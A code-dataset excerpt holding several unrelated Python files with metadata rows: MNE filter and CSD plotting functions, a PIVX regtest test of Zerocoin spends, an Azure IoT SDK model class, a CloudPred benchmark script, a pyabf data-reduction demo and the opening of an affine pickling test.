# Magnitude
if 'magnitude' in plot:
ax_mag_idx = np.where([p == 'magnitude' for p in plot])[0][0]
axes[ax_mag_idx].plot(f[sl], mag[sl], color=color,
linewidth=2, zorder=4)
if freq is not None and gain is not None:
plot_ideal_filter(freq, gain, axes[ax_mag_idx],
fscale=fscale, show=False)
axes[ax_mag_idx].set(ylabel='Magnitude (dB)', xlabel='', xscale=fscale)
if xticks is not None:
axes[ax_mag_idx].set(xticks=xticks)
axes[ax_mag_idx].set(xticklabels=xticklabels)
axes[ax_mag_idx].set(xlim=flim, ylim=alim, xlabel='Frequency (Hz)',
ylabel='Amplitude (dB)')
# Delay
if 'delay' in plot:
ax_delay_idx = np.where([p == 'delay' for p in plot])[0][0]
axes[ax_delay_idx].plot(f[sl], gd[sl], color=color,
linewidth=2, zorder=4)
# shade nulled regions
for start, stop in zip(*_mask_to_onsets_offsets(mag <= -39.9)):
axes[ax_delay_idx].axvspan(f[start], f[stop - 1],
facecolor='k', alpha=0.05,
zorder=5)
axes[ax_delay_idx].set(xlim=flim, ylabel='Group delay (s)',
xlabel='Frequency (Hz)',
xscale=fscale)
if xticks is not None:
axes[ax_delay_idx].set(xticks=xticks)
axes[ax_delay_idx].set(xticklabels=xticklabels)
axes[ax_delay_idx].set(xlim=flim, ylim=dlim, xlabel='Frequency (Hz)',
ylabel='Delay (s)')
adjust_axes(axes)
tight_layout()
plt_show(show)
return fig
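# A minimal usage sketch: design a 1-40 Hz band-pass FIR filter for data
# sampled at 1 kHz and inspect it. ``data=None`` skips the signal-length
# sanity check in :func:`mne.filter.create_filter`.
#
#   import mne
#   h = mne.filter.create_filter(data=None, sfreq=1000.,
#                                l_freq=1., h_freq=40.)
#   fig = plot_filter(h, sfreq=1000., compensate=True)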
def plot_ideal_filter(freq, gain, axes=None, title='', flim=None, fscale='log',
alim=_DEFAULT_ALIM, color='r', alpha=0.5, linestyle='--',
show=True):
"""Plot an ideal filter response.
Parameters
----------
freq : array-like
The ideal response frequencies to plot (must be in ascending order).
gain : array-like or None
The ideal response gains to plot.
axes : instance of Axes | None
The subplot handle. With None (default), axes are created.
title : str
The title to use, (default: '').
flim : tuple or None
If not None, the x-axis frequency limits (Hz) to use.
If None (default), freq used.
fscale : str
Frequency scaling to use, can be "log" (default) or "linear".
    alim : tuple
        The y-axis amplitude limits (dB) to use (default: (-80, 10)).
color : color object
The color to use (default: 'r').
alpha : float
The alpha to use (default: 0.5).
linestyle : str
The line style to use (default: '--').
show : bool
Show figure if True (default).
Returns
-------
fig : instance of matplotlib.figure.Figure
The figure.
See Also
--------
plot_filter
Notes
-----
.. versionadded:: 0.14
Examples
--------
Plot a simple ideal band-pass filter::
>>> from mne.viz import plot_ideal_filter
>>> freq = [0, 1, 40, 50]
>>> gain = [0, 1, 1, 0]
>>> plot_ideal_filter(freq, gain, flim=(0.1, 100)) #doctest: +ELLIPSIS
<...Figure...>
"""
import matplotlib.pyplot as plt
my_freq, my_gain = list(), list()
if freq[0] != 0:
raise ValueError('freq should start with DC (zero) and end with '
'Nyquist, but got %s for DC' % (freq[0],))
    freq = np.array(freq, float)  # float: freq[0] may be nudged below
# deal with semilogx problems @ x=0
_check_option('fscale', fscale, ['log', 'linear'])
if fscale == 'log':
freq[0] = 0.1 * freq[1] if flim is None else min(flim[0], freq[1])
flim = _get_flim(flim, fscale, freq)
transitions = list()
for ii in range(len(freq)):
if ii < len(freq) - 1 and gain[ii] != gain[ii + 1]:
transitions += [[freq[ii], freq[ii + 1]]]
my_freq += np.linspace(freq[ii], freq[ii + 1], 20,
endpoint=False).tolist()
my_gain += np.linspace(gain[ii], gain[ii + 1], 20,
endpoint=False).tolist()
else:
my_freq.append(freq[ii])
my_gain.append(gain[ii])
my_gain = 10 * np.log10(np.maximum(my_gain, 10 ** (alim[0] / 10.)))
if axes is None:
axes = plt.subplots(1)[1]
for transition in transitions:
axes.axvspan(*transition, color=color, alpha=0.1)
axes.plot(my_freq, my_gain, color=color, linestyle=linestyle, alpha=0.5,
linewidth=4, zorder=3)
xticks, xticklabels = _filter_ticks(flim, fscale)
axes.set(ylim=alim, xlabel='Frequency (Hz)', ylabel='Amplitude (dB)',
xscale=fscale)
if xticks is not None:
axes.set(xticks=xticks)
axes.set(xticklabels=xticklabels)
axes.set(xlim=flim)
if title:
axes.set(title=title)
adjust_axes(axes)
tight_layout()
plt_show(show)
return axes.figure
def _handle_event_colors(color_dict, unique_events, event_id):
"""Create event-integer-to-color mapping, assigning defaults as needed."""
default_colors = dict(zip(sorted(unique_events), cycle(_get_color_list())))
# warn if not enough colors
if color_dict is None:
if len(unique_events) > len(_get_color_list()):
warn('More events than default colors available. You should pass '
'a list of unique colors.')
else:
custom_colors = dict()
for key, color in color_dict.items():
if key in unique_events: # key was a valid event integer
custom_colors[key] = color
elif key in event_id: # key was an event label
custom_colors[event_id[key]] = color
else: # key not a valid event, warn and ignore
warn('Event ID %s is in the color dict but is not '
'present in events or event_id.' % str(key))
# warn if color_dict is missing any entries
unassigned = sorted(set(unique_events) - set(custom_colors))
if len(unassigned):
unassigned_str = ', '.join(str(e) for e in unassigned)
warn('Color was not assigned for event%s %s. Default colors will '
'be used.' % (_pl(unassigned), unassigned_str))
default_colors.update(custom_colors)
return default_colors
def plot_csd(csd, info=None, mode='csd', colorbar=True, cmap=None,
n_cols=None, show=True):
"""Plot CSD matrices.
A sub-plot is created for each frequency. If an info object is passed to
the function, different channel types are plotted in different figures.
Parameters
----------
csd : instance of CrossSpectralDensity
The CSD matrix to plot.
info : instance of Info | None
To split the figure by channel-type, provide the measurement info.
By default, the CSD matrix is plotted as a whole.
mode : 'csd' | 'coh'
Whether to plot the cross-spectral density ('csd', the default), or
the coherence ('coh') between the channels.
colorbar : bool
Whether to show a colorbar. Defaults to ``True``.
cmap : str | None
The matplotlib colormap to use. Defaults to None, which means the
colormap will default to matplotlib's default.
n_cols : int | None
        CSD matrices are plotted in a grid. This parameter controls how
        many matrices to plot side by side before starting a new row. By
default, a number will be chosen to make the grid as square as
possible.
show : bool
Whether to show the figure. Defaults to ``True``.
Returns
-------
fig : list of Figure
The figures created by this function.
"""
import matplotlib.pyplot as plt
if mode not in ['csd', 'coh']:
raise ValueError('"mode" should be either "csd" or "coh".')
if info is not None:
info_ch_names = info['ch_names']
sel_eeg = pick_types(info, meg=False, eeg=True, ref_meg=False,
exclude=[])
sel_mag = pick_types(info, meg='mag', eeg=False, ref_meg=False,
exclude=[])
sel_grad = pick_types(info, meg='grad', eeg=False, ref_meg=False,
exclude=[])
idx_eeg = [csd.ch_names.index(info_ch_names[c])
for c in sel_eeg if info_ch_names[c] in csd.ch_names]
idx_mag = [csd.ch_names.index(info_ch_names[c])
for c in sel_mag if info_ch_names[c] in csd.ch_names]
idx_grad = [csd.ch_names.index(info_ch_names[c])
for c in sel_grad if info_ch_names[c] in csd.ch_names]
indices = [idx_eeg, idx_mag, idx_grad]
titles = ['EEG', 'Magnetometers', 'Gradiometers']
if mode == 'csd':
# The units in which to plot the CSD
units = dict(eeg='µV²', grad='fT²/cm²', mag='fT²')
scalings = dict(eeg=1e12, grad=1e26, mag=1e30)
else:
indices = [np.arange(len(csd.ch_names))]
if mode == 'csd':
titles = ['Cross-spectral density']
# Units and scaling unknown
units = dict()
scalings = dict()
elif mode == 'coh':
titles = ['Coherence']
n_freqs = len(csd.frequencies)
if n_cols is None:
n_cols = int(np.ceil(np.sqrt(n_freqs)))
n_rows = int(np.ceil(n_freqs / float(n_cols)))
figs = []
for ind, title, ch_type in zip(indices, titles, ['eeg', 'mag', 'grad']):
if len(ind) == 0:
continue
fig, axes = plt.subplots(n_rows, n_cols, squeeze=False,
figsize=(2 * n_cols + 1, 2.2 * n_rows))
csd_mats = []
for i in range(len(csd.frequencies)):
cm = csd.get_data(index=i)[ind][:, ind]
if mode == 'csd':
cm = np.abs(cm) * scalings.get(ch_type, 1)
elif mode == 'coh':
# Compute coherence from the CSD matrix
psd = np.diag(cm).real
cm = np.abs(cm) ** 2 / psd[np.newaxis, :] / psd[:, np.newaxis]
csd_mats.append(cm)
vmax = np.max(csd_mats)
for i, (freq, mat) in enumerate(zip(csd.frequencies, csd_mats)):
ax = axes[i // n_cols][i % n_cols]
im = ax.imshow(mat, interpolation='nearest', cmap=cmap, vmin=0,
vmax=vmax)
ax.set_xticks([])
ax.set_yticks([])
if csd._is_sum:
ax.set_title('%.1f-%.1f Hz.' % (np.min(freq),
np.max(freq)))
else:
ax.set_title('%.1f Hz.' % freq)
plt.suptitle(title)
plt.subplots_adjust(top=0.8)
if colorbar:
cb = plt.colorbar(im, ax=[a for ax_ in axes for a in ax_])
if mode == 'csd':
label = u'CSD'
if ch_type in units:
label += u' (%s)' % units[ch_type]
cb.set_label(label)
elif mode == 'coh':
cb.set_label('Coherence')
figs.append(fig)
plt_show(show)
return figs
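# A minimal usage sketch, assuming ``epochs`` is an existing :class:`mne.Epochs`
# instance; ``mode='coh'`` normalizes the CSD to coherence per channel pair:
#
#   from mne.time_frequency import csd_morlet
#   csd = csd_morlet(epochs, frequencies=[10., 20.])
#   figs = plot_csd(csd, info=epochs.info, mode='coh')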
| mne/viz/misc.py | 48,875 | Check for valid fscale.
Create approximately spaced ticks between lims.
Get reasonable frequency limits.
Get our press callback.
Create event-integer-to-color mapping, assigning defaults as needed.
Plot BEM contours on anatomical slices.
Adjust some properties of axes.
Parameters
----------
axes : list
List of axes to process.
remove_spines : list of str
Which axis spines to remove.
grid : bool
Turn grid on (True) or off (False).
Plot BEM contours on anatomical slices.
Parameters
----------
subject : str
Subject name.
subjects_dir : str | None
Path to the SUBJECTS_DIR. If None, the path is obtained by using
the environment variable SUBJECTS_DIR.
orientation : str
'coronal' or 'axial' or 'sagittal'.
slices : list of int
Slice indices.
brain_surfaces : None | str | list of str
One or more brain surface to plot (optional). Entries should correspond
to files in the subject's ``surf`` directory (e.g. ``"white"``).
src : None | SourceSpaces | str
SourceSpaces instance or path to a source space to plot individual
sources as scatter-plot. Sources will be shown on exactly one slice
(whichever slice is closest to each source in the given orientation
plane). Path can be absolute or relative to the subject's ``bem``
folder.
.. versionchanged:: 0.20
All sources are shown on the nearest slice rather than some
being omitted.
show : bool
Show figure if True.
show_indices : bool
Show slice indices if True.
.. versionadded:: 0.20
mri : str
The name of the MRI to use. Can be a standard FreeSurfer MRI such as
``'T1.mgz'``, or a full path to a custom MRI file.
.. versionadded:: 0.21
show_orientation : str
Show the orientation (L/R, P/A, I/S) of the data slices.
.. versionadded:: 0.21
Returns
-------
fig : instance of matplotlib.figure.Figure
The figure.
See Also
--------
mne.viz.plot_alignment
Notes
-----
Images are plotted in MRI voxel coordinates.
If ``src`` is not None, for a given slice index, all source points are
shown that are halfway between the previous slice and the given slice,
and halfway between the given slice and the next slice.
For large slice decimations, this can
make some source points appear outside the BEM contour, which is shown
for the given slice index. For example, in the case where the single
midpoint slice is used ``slices=[128]``, all source points will be shown
on top of the midpoint MRI slice with the BEM boundary drawn for that
slice.
Plot Covariance data.
Parameters
----------
cov : instance of Covariance
The covariance matrix.
info : dict
Measurement info.
exclude : list of str | str
List of channels to exclude. If empty do not exclude any channel.
If 'bads', exclude info['bads'].
colorbar : bool
Show colorbar or not.
proj : bool
Apply projections or not.
show_svd : bool
Plot also singular values of the noise covariance for each sensor
type. We show square roots ie. standard deviations.
show : bool
Show figure if True.
%(verbose)s
Returns
-------
fig_cov : instance of matplotlib.figure.Figure
The covariance plot.
fig_svd : instance of matplotlib.figure.Figure | None
The SVD spectra plot of the covariance.
See Also
--------
mne.compute_rank
Notes
-----
For each channel type, the rank is estimated using
:func:`mne.compute_rank`.
.. versionchanged:: 0.19
Approximate ranks for each channel type are shown with red dashed lines.
Plot CSD matrices.
A sub-plot is created for each frequency. If an info object is passed to
the function, different channel types are plotted in different figures.
Parameters
----------
csd : instance of CrossSpectralDensity
The CSD matrix to plot.
info : instance of Info | None
To split the figure by channel-type, provide the measurement info.
By default, the CSD matrix is plotted as a whole.
mode : 'csd' | 'coh'
Whether to plot the cross-spectral density ('csd', the default), or
the coherence ('coh') between the channels.
colorbar : bool
Whether to show a colorbar. Defaults to ``True``.
cmap : str | None
The matplotlib colormap to use. Defaults to None, which means the
colormap will default to matplotlib's default.
n_cols : int | None
CSD matrices are plotted in a grid. This parameter controls how
many matrix to plot side by side before starting a new row. By
default, a number will be chosen to make the grid as square as
possible.
show : bool
Whether to show the figure. Defaults to ``True``.
Returns
-------
fig : list of Figure
The figures created by this function.
Plot the amplitude traces of a set of dipoles.
Parameters
----------
dipoles : list of instance of Dipole
The dipoles whose amplitudes should be shown.
colors : list of color | None
Color to plot with each dipole. If None default colors are used.
show : bool
Show figure if True.
Returns
-------
fig : matplotlib.figure.Figure
The figure object containing the plot.
Notes
-----
.. versionadded:: 0.9.0
Plot events to get a visual display of the paradigm.
Parameters
----------
events : array, shape (n_events, 3)
The events.
sfreq : float | None
The sample frequency. If None, data will be displayed in samples (not
seconds).
first_samp : int
The index of the first sample. Recordings made on Neuromag systems
number samples relative to the system start (not relative to the
beginning of the recording). In such cases the ``raw.first_samp``
attribute can be passed here. Default is 0.
color : dict | None
Dictionary of event_id integers as keys and colors as values. If None,
colors are automatically drawn from a default list (cycled through if
number of events longer than list of default colors). Color can be any
valid :doc:`matplotlib color <tutorials/colors/colors>`.
event_id : dict | None
Dictionary of event labels (e.g. 'aud_l') as keys and their associated
event_id values. Labels are used to plot a legend. If None, no legend
is drawn.
axes : instance of Axes
The subplot handle.
equal_spacing : bool
Use equal spacing between events in y-axis.
show : bool
Show figure if True.
%(on_missing_events)s
%(verbose)s
Returns
-------
fig : matplotlib.figure.Figure
The figure object containing the plot.
Notes
-----
.. versionadded:: 0.9.0
Plot properties of a filter.
Parameters
----------
h : dict or ndarray
An IIR dict or 1D ndarray of coefficients (for FIR filter).
sfreq : float
Sample rate of the data (Hz).
freq : array-like or None
The ideal response frequencies to plot (must be in ascending order).
If None (default), do not plot the ideal response.
gain : array-like or None
The ideal response gains to plot.
If None (default), do not plot the ideal response.
title : str | None
The title to use. If None (default), determine the title based
on the type of the system.
color : color object
The color to use (default '#1f77b4').
flim : tuple or None
If not None, the x-axis frequency limits (Hz) to use.
If None, freq will be used. If None (default) and freq is None,
``(0.1, sfreq / 2.)`` will be used.
fscale : str
Frequency scaling to use, can be "log" (default) or "linear".
alim : tuple
The y-axis amplitude limits (dB) to use (default: (-60, 10)).
show : bool
Show figure if True (default).
compensate : bool
If True, compensate for the filter delay (phase will not be shown).
- For linear-phase FIR filters, this visualizes the filter coefficients
assuming that the output will be shifted by ``N // 2``.
- For IIR filters, this changes the filter coefficient display
by filtering backward and forward, and the frequency response
by squaring it.
.. versionadded:: 0.18
plot : list | tuple | str
A list of the requested plots from ``time``, ``magnitude`` and
``delay``. Default is to plot all three filter properties
('time', 'magnitude', 'delay').
.. versionadded:: 0.21.0
axes : instance of Axes | list | None
The axes to plot to. If list, the list must be a list of Axes of
the same length as the number of requested plot types. If instance of
Axes, there must be only one filter property plotted.
Defaults to ``None``.
.. versionadded:: 0.21.0
Returns
-------
fig : matplotlib.figure.Figure
The figure containing the plots.
See Also
--------
mne.filter.create_filter
plot_ideal_filter
Notes
-----
.. versionadded:: 0.14
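Assuming MNE is installed, a typical call pairs this function with
``mne.filter.create_filter`` (the parameter values below are illustrative)::

    import numpy as np
    import mne

    sfreq = 1000.
    # Design a 1-40 Hz FIR band-pass for 8 s of data sampled at 1 kHz
    h = mne.filter.create_filter(np.zeros(8000), sfreq, l_freq=1., h_freq=40.)
    fig = mne.viz.plot_filter(h, sfreq, flim=(0.01, 400.))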
Plot an ideal filter response.
Parameters
----------
freq : array-like
The ideal response frequencies to plot (must be in ascending order).
gain : array-like or None
The ideal response gains to plot.
axes : instance of Axes | None
The subplot handle. With None (default), axes are created.
title : str
        The title to use (default: '').
flim : tuple or None
If not None, the x-axis frequency limits (Hz) to use.
        If None (default), ``freq`` is used.
fscale : str
Frequency scaling to use, can be "log" (default) or "linear".
alim : tuple
        If not None, the y-axis amplitude limits (dB) to use.
color : color object
The color to use (default: 'r').
alpha : float
The alpha to use (default: 0.5).
linestyle : str
The line style to use (default: '--').
show : bool
Show figure if True (default).
Returns
-------
fig : instance of matplotlib.figure.Figure
The figure.
See Also
--------
plot_filter
Notes
-----
.. versionadded:: 0.14
Examples
--------
Plot a simple ideal band-pass filter::
>>> from mne.viz import plot_ideal_filter
>>> freq = [0, 1, 40, 50]
>>> gain = [0, 1, 1, 0]
>>> plot_ideal_filter(freq, gain, flim=(0.1, 100)) #doctest: +ELLIPSIS
<...Figure...>
Plot source power in a time-frequency grid.
Parameters
----------
stcs : list of SourceEstimate
        Source power for consecutive time windows; one SourceEstimate object
        should be provided for each frequency bin.
freq_bins : list of tuples of float
Start and end points of frequency bins of interest.
tmin : float
Minimum time instant to show.
tmax : float
Maximum time instant to show.
source_index : int | None
Index of source for which the spectrogram will be plotted. If None,
the source with the largest activation will be selected.
colorbar : bool
        If True, a colorbar will be added to the plot.
show : bool
Show figure if True.
Returns
-------
fig : instance of Figure
The figure.
Functions to make simple plots with M/EEG data.
-*- coding: utf-8 -*- Authors: Alexandre Gramfort <alexandre.gramfort@inria.fr>, Denis Engemann <denis.engemann@gmail.com>, Martin Luessi <mluessi@nmr.mgh.harvard.edu>, Eric Larson <larson.eric.d@gmail.com>, Cathy Nangini <cnangini@gmail.com>, Mainak Jas <mainak@neuro.hut.fi>. License: Simplified BSD. [Scattered inline implementation comments omitted.] | 12,603 | en | 0.682281 |
#!/usr/bin/env python3
# Copyright (c) 2019-2020 The PIVX developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
'''
Tests v2, v3 and v4 Zerocoin Spends
'''
from time import sleep
from test_framework.authproxy import JSONRPCException
from test_framework.test_framework import PnyTestFramework
from test_framework.util import (
sync_blocks,
assert_equal,
assert_raises_rpc_error,
set_node_times,
DecimalAmt
)
class ZerocoinSpendTest(PnyTestFramework):
def set_test_params(self):
self.num_nodes = 3
# node 0 and node 1 move the chain (node 0 also sets the sporks)
# node 2 does the spends
        self.extra_args = [[] for _ in range(self.num_nodes)]  # independent per-node lists ([[]] * n would share one list)
self.extra_args[0].append('-sporkkey=932HEevBSujW2ud7RfB1YF91AFygbBRQj3de3LyaCRqNzKKgWXi')
def setup_chain(self):
# Start with PoS cache: 330 blocks
self._initialize_chain(toPosPhase=True)
self.enable_mocktime()
def log_title(self):
title = "*** Starting %s ***" % self.__class__.__name__
underline = "-" * len(title)
description = "Tests v2, v3 and v4 Zerocoin Spends."
self.log.info("\n\n%s\n%s\n%s\n", title, underline, description)
def setV4SpendEnforcement(self, fEnable=True):
sporkName = "SPORK_18_ZEROCOIN_PUBLICSPEND_V4"
# update spork 18 with node[0]
if fEnable:
self.log.info("Enabling v4 PublicSpend version with SPORK 18...")
res = self.activate_spork(0, sporkName)
else:
self.log.info("Enabling v3 PublicSpend version with SPORK 18...")
res = self.deactivate_spork(0, sporkName)
assert_equal(res, "success")
sleep(1)
# check that node[1] receives it
assert_equal(fEnable, self.is_spork_active(1, sporkName))
self.log.info("done")
def run_test(self):
def get_zerocoin_data(coin):
return coin["s"], coin["r"], coin["k"], coin["id"], coin["d"], coin["t"]
def check_balances(denom, zpny_bal, pny_bal):
zpny_bal -= denom
assert_equal(self.nodes[2].getzerocoinbalance()['Total'], zpny_bal)
pny_bal += denom
wi = self.nodes[2].getwalletinfo()
assert_equal(wi['balance'] + wi['immature_balance'], pny_bal)
return zpny_bal, pny_bal
def stake_4_blocks(block_time):
for peer in range(2):
for i in range(2):
block_time = self.generate_pos(peer, block_time)
sync_blocks(self.nodes)
return block_time
self.log_title()
block_time = self.mocktime
set_node_times(self.nodes, block_time)
# Start with cache balances
wi = self.nodes[2].getwalletinfo()
balance = wi['balance'] + wi['immature_balance']
zpny_balance = self.nodes[2].getzerocoinbalance()['Total']
assert_equal(balance, DecimalAmt(13833.92))
assert_equal(zpny_balance, 6666)
# Export zerocoin data
listmints = self.nodes[2].listmintedzerocoins(True, True)
serial_ids = [mint["serial hash"] for mint in listmints]
exported_zerocoins = [x for x in self.nodes[2].exportzerocoins(False) if x["id"] in serial_ids]
exported_zerocoins.sort(key=lambda x: x["d"], reverse=False)
assert_equal(8, len(exported_zerocoins))
# 1) stake more blocks - save a v3 spend for later (serial_1)
serial_1, randomness_1, privkey_1, id_1, denom_1, tx_1 = get_zerocoin_data(exported_zerocoins[1])
self.log.info("Staking 70 blocks to get to public spend activation")
for j in range(5):
for peer in range(2):
for i in range(7):
block_time = self.generate_pos(peer, block_time)
sync_blocks(self.nodes)
old_spend_v3 = self.nodes[2].createrawzerocoinspend(id_1)
# 2) Spend one minted coin - spend v3 (serial_2)
serial_2, randomness_2, privkey_2, id_2, denom_2, tx_2 = get_zerocoin_data(exported_zerocoins[2])
self.log.info("Spending the minted coin with serial %s..." % serial_2[:16])
txid = self.nodes[2].spendzerocoinmints([id_2])['txid']
# stake 4 blocks - check it gets included on chain and check balances
block_time = stake_4_blocks(block_time)
self.check_tx_in_chain(0, txid)
zpny_balance, balance = check_balances(denom_2, zpny_balance, balance)
self.log.info("--> VALID PUBLIC COIN SPEND (v3) PASSED")
# 3) Check double spends - spend v3
self.log.info("Trying to spend the serial twice now...")
assert_raises_rpc_error(-4, "Trying to spend an already spent serial",
self.nodes[2].spendrawzerocoin, serial_2, randomness_2, denom_2, privkey_2, "", tx_2)
# 4) Activate v4 spends with SPORK_18
self.setV4SpendEnforcement()
# 5) Spend one minted coin - spend v4 (serial_3)
serial_3, randomness_3, privkey_3, id_3, denom_3, tx_3 = get_zerocoin_data(exported_zerocoins[3])
self.log.info("Spending the minted coin with serial %s..." % serial_3[:16])
txid = self.nodes[2].spendzerocoinmints([id_3])['txid']
# stake 4 blocks - check it gets included on chain and check balances
block_time = stake_4_blocks(block_time)
self.check_tx_in_chain(0, txid)
zpny_balance, balance = check_balances(denom_3, zpny_balance, balance)
self.log.info("--> VALID PUBLIC COIN SPEND (v4) PASSED")
# 6) Check double spends - spend v4
self.log.info("Trying to spend the serial twice now...")
assert_raises_rpc_error(-4, "Trying to spend an already spent serial",
self.nodes[2].spendrawzerocoin, serial_3, randomness_3, denom_3, privkey_3, "", tx_3)
# 7) Try to relay old v3 spend now (serial_1)
self.log.info("Trying to send old v3 spend now...")
assert_raises_rpc_error(-26, "bad-txns-invalid-zpny",
self.nodes[2].sendrawtransaction, old_spend_v3)
self.log.info("GOOD: Old transaction not sent.")
# 8) Try to double spend with v4 a mint already spent with v3 (serial_2)
self.log.info("Trying to double spend v4 against v3...")
assert_raises_rpc_error(-4, "Trying to spend an already spent serial",
self.nodes[2].spendrawzerocoin, serial_2, randomness_2, denom_2, privkey_2, "", tx_2)
self.log.info("GOOD: Double-spending transaction did not verify.")
# 9) Reactivate v3 spends and try to spend the old saved one (serial_1) again
self.setV4SpendEnforcement(False)
self.log.info("Trying to send old v3 spend now (serial: %s...)" % serial_1[:16])
txid = self.nodes[2].sendrawtransaction(old_spend_v3)
# stake 4 blocks - check it gets included on chain and check balances
_ = stake_4_blocks(block_time)
self.check_tx_in_chain(0, txid)
# need to reset spent mints since this was a raw broadcast
self.nodes[2].resetmintzerocoin()
_, _ = check_balances(denom_1, zpny_balance, balance)
self.log.info("--> VALID PUBLIC COIN SPEND (v3) PASSED")
if __name__ == '__main__':
ZerocoinSpendTest().main()
| test/functional/wallet_zerocoin_publicspends.py | 7,398 | Tests v2, v3 and v4 Zerocoin Spends
| 1,171 | en | 0.84856 |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class ConfigurationQueriesTestResponse(Model):
"""ConfigurationQueriesTestResponse.
:param target_condition_error:
:type target_condition_error: str
:param custom_metric_query_errors:
:type custom_metric_query_errors: dict[str, str]
"""
_attribute_map = {
'target_condition_error': {'key': 'targetConditionError', 'type': 'str'},
'custom_metric_query_errors': {'key': 'customMetricQueryErrors', 'type': '{str}'},
}
def __init__(self, **kwargs):
super(ConfigurationQueriesTestResponse, self).__init__(**kwargs)
self.target_condition_error = kwargs.get('target_condition_error', None)
self.custom_metric_query_errors = kwargs.get('custom_metric_query_errors', None)
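# A minimal usage sketch (values are illustrative; in practice msrest
# deserializes this model from the service response):
if __name__ == '__main__':
    resp = ConfigurationQueriesTestResponse(
        custom_metric_query_errors={'myMetric': 'Query is invalid'})
    print(resp.custom_metric_query_errors)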
| azext_iot/sdk/iothub/service/models/configuration_queries_test_response.py | 1,258 | ConfigurationQueriesTestResponse.
:param target_condition_error:
:type target_condition_error: str
:param custom_metric_query_errors:
:type custom_metric_query_errors: dict[str, str]
| 638 | en | 0.472855 |
########################################################
# run_tp.py
# Author: Jamie Zhu <jimzhu@GitHub>
# Created: 2014/2/6
# Last updated: 2014/5/8
# Implemented approach: CloudPred
# Evaluation metrics: MAE, NMAE, RMSE, MRE, NPRE
########################################################
import numpy as np
import os, sys, time
import multiprocessing
sys.path.append('src')
# Build external model
if not os.path.isfile('src/core.so'):
    print('Lack of core.so (built from the C++ module).')
    print('Please first build the C++ code into core.so by using: ')
    print('>> python setup.py build_ext --inplace')
sys.exit()
from utilities import *
import evaluator
import dataloader
#########################################################
# config area
#
para = {'dataType': 'tp', # set the dataType as 'rt' or 'tp'
'dataPath': '../data/dataset#1/',
'outPath': 'result/',
'metrics': ['MAE', 'NMAE', 'RMSE', 'MRE', 'NPRE'], # delete where appropriate
'density': list(np.arange(0.05, 0.31, 0.05)), # matrix density
'rounds': 20, # how many runs are performed at each matrix density
        'dimension': 20, # dimensionality of the latent factors
'lambda': 800, # regularization parameter
'topK': 10, # the parameter of TopK similar users or services, the default value is
# topK = 10 as in the reference paper
'weight': 0.5, # the combination weight of UPCC and IPCC, the default value is
# weight = 0.5 as in the reference paper
'maxIter': 300, # the max iterations
'saveTimeInfo': False, # whether to keep track of the running time
'saveLog': False, # whether to save log into file
'debugMode': False, # whether to record the debug info
'parallelMode': True # whether to leverage multiprocessing for speedup
}
initConfig(para)
#########################################################
startTime = time.clock() # start timing
logger.info('==============================================')
logger.info('CloudPred: [Zhang et al, SRDS\'2011].')
# load the dataset
dataMatrix = dataloader.load(para)
logger.info('Loading data done.')
# run for each density
if para['parallelMode']: # run on multiple processes
pool = multiprocessing.Pool()
for density in para['density']:
pool.apply_async(evaluator.execute, (dataMatrix, density, para))
pool.close()
pool.join()
else: # run on a single process
for density in para['density']:
evaluator.execute(dataMatrix, density, para)
logger.info(time.strftime('All done. Total running time: %d-th day - %Hhour - %Mmin - %Ssec.',
time.gmtime(time.clock() - startTime)))
logger.info('==============================================')
sys.path.remove('src')
| benchmarks/hybrid/CloudPred/run_tp.py | 2,667 | run_tp.py; Author: Jamie Zhu <jimzhu@GitHub>; Created: 2014/2/6; Last updated: 2014/5/8; Implemented approach: CloudPred; Evaluation metrics: MAE, NMAE, RMSE, MRE, NPRE | 867 | en | 0.781422 |
"""This code demonstrates how to perform the tested data reduction module.
"""
import os
import sys
import glob
import pyabf
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D  # noqa: F401 -- registers the '3d' projection (needed on older matplotlib)
pathToHere = os.path.abspath(os.path.dirname(__file__))
pathToData = os.path.abspath(pathToHere + "/../data/")
pathToModule = os.path.abspath(pathToHere + "/../../src/")
sys.path.insert(0, pathToModule)
import drtest as dr
for file in sorted(glob.glob(pathToData + "/*.abf")):
abf = pyabf.ABF(file)
abf.setSweep(4, 1)
xdata = abf.sweepX
ydata = abf.sweepY
da = dr.DataAnalysis(xdata, ydata)
xdec, ydec = da.data_reduction(method='decimate', reduction_factor=4)
xavr, yavr = da.data_reduction(method='average', reduction_factor=4)
xmin, ymin = da.data_reduction(method='min', reduction_factor=4)
xmax, ymax = da.data_reduction(method='max', reduction_factor=4)
xminmax, yminmax = da.data_reduction(method='min/max', reduction_factor=4)
xxxx = [xdec, xavr, xmin, xmax, xminmax]
yyyy = [ydec, yavr, ymin, ymax, yminmax]
## 2D plot
# plt.plot(xdec, ydec)
# plt.plot(xavr, yavr)
# plt.plot(xmin, ymin)
# plt.plot(xmax, ymax)
# plt.show()
## 3D plot
fig = plt.figure()
ax = fig.gca(projection='3d')
zs = [i for i in range(0, 6)]
ax.plot(xdata, ydata, zs[0], zdir='y', color='black', linewidth=1.5)
ax.plot(xdec, ydec, zs[1], zdir='y', color='red', linewidth=1.5)
ax.plot(xavr, yavr, zs[2], zdir='y', color='green', linewidth=1.5)
ax.plot(xmin, ymin, zs[3], zdir='y', color='orange', linewidth=1.5)
ax.plot(xmax, ymax, zs[4], zdir='y', color='blue', linewidth=1.5)
ax.plot(xminmax, yminmax, zs[5], zdir='y', color='brown', linewidth=1.5)
zlabels = [' ', 'raw data', 'decimate', 'average', 'minimum', 'maximum', 'min/max']
ax.set_xlabel('Time (s)', fontweight='bold', fontsize='medium')
ax.set_zlabel('Voltage (mV)', fontweight='bold', fontsize='medium')
ax.set_yticklabels(zlabels, rotation=-15, verticalalignment='baseline', horizontalalignment='left', fontweight='bold')
for angle in range(0, 360):
ax.view_init(25, angle)
plt.draw()
        plt.pause(.0001) | examples/scripts/data_reduction_ex1.py | 2,320 | This code demonstrates how to use the tested data reduction module.
| 184 | en | 0.262137 |
"""
Validate that instances of `affine.Affine()` can be pickled and unpickled.
"""
import pickle
from multiprocessing import Pool
import affine
def test_pickle():
a = affine.Affine(1, 2, 3, 4, 5, 6)
assert pickle.loads(pickle.dumps(a)) == a
def _mp_proc(x):
